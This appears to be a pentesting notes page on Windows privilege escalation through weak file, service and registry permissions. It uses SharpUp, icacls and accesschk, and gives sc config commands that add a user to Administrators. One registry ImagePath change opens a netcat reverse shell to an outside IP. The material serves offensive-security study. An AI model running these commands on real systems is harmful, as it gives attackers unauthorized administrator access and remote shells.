DiscordHackTheBoxTryHackMeGitHub

Weak Permissions

Here would be an examples of weak permissions abuse

Permissive File System ACLs

Running SharpUp

  • Tool: SharpUp from GhostPack to check for weak ACLs.

PS C:\> .\SharpUp.exe audit

  • Example vulnerable service:

    • Name: SecurityService

    • Path: "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Checking Permissions with icacls

PS C:\> icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"

  • Output shows Everyone and BUILTIN\Users have Full Control.

Replacing Service Binary with malicious one

C:\> cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
C:\> sc start SecurityService

  • Replace with a malicious binary to gain SYSTEM privileges.

Weak Service Permissions

Checking Modifiable Services with SharpUp

C:\> SharpUp.exe audit

  • Example vulnerable service:

    • Name: WindscribeService

    • Path: "C:\Program Files (x86)\Windscribe\WindscribeService.exe"

Checking Permissions with accesschk

C:\> accesschk.exe /accepteula -quvcw WindscribeService

  • NT AUTHORITY\Authenticated Users has SERVICE_ALL_ACCESS (full control).

Changing the Service Binary Path

C:\> sc config WindscribeService binpath="cmd /c net localgroup administrators ven17 /add"

  • Grants user ven17 administrator rights.

Stopping & Starting the Service

C:\> sc stop WindscribeService
C:\> sc start WindscribeService

  • Executes the new binary path.

Confirming Privilege Escalation

C:\> net localgroup administrators

  • Verify if ven17 was added to the Administrators group.

Resetting the Binary Path (Cleanup)

C:\> sc config WindscribeService binpath="c:\Program Files (x86)\Windscribe\WindscribeService.exe"
C:\> sc start WindscribeService
C:\> sc query WindscribeService

Unquoted Service Path

  • If a service binary path is not enclosed in quotes, Windows may execute unintended binaries.

  • Example vulnerable service:

    C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe

  • Windows may execute:

    • C:\Program.exe

    • C:\Program Files\System.exe

Finding Unquoted Service Paths

C:\> wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Permissive Registry ACLs

Checking for Weak Service ACLs in the Registry

C:\> accesschk.exe /accepteula "ven17" -kvuqsw hklm\System\CurrentControlSet\services

  • Example vulnerable service: ModelManagerService

  • Allows modification of the ImagePath.

Changing ImagePath with PowerShell

PS C:\> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\ven17\Downloads\nc.exe -e cmd.exe 13.13.13.13 443"

  • Executes Netcat shell upon service start.

Modifiable Registry Autorun Binaries

Checking Startup Programs

PS C:\> Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl

  • If the attacker can modify a startup binary, they can execute malicious code on user login.

PreviousUser-Interaction AttacksNextTheory

Last updated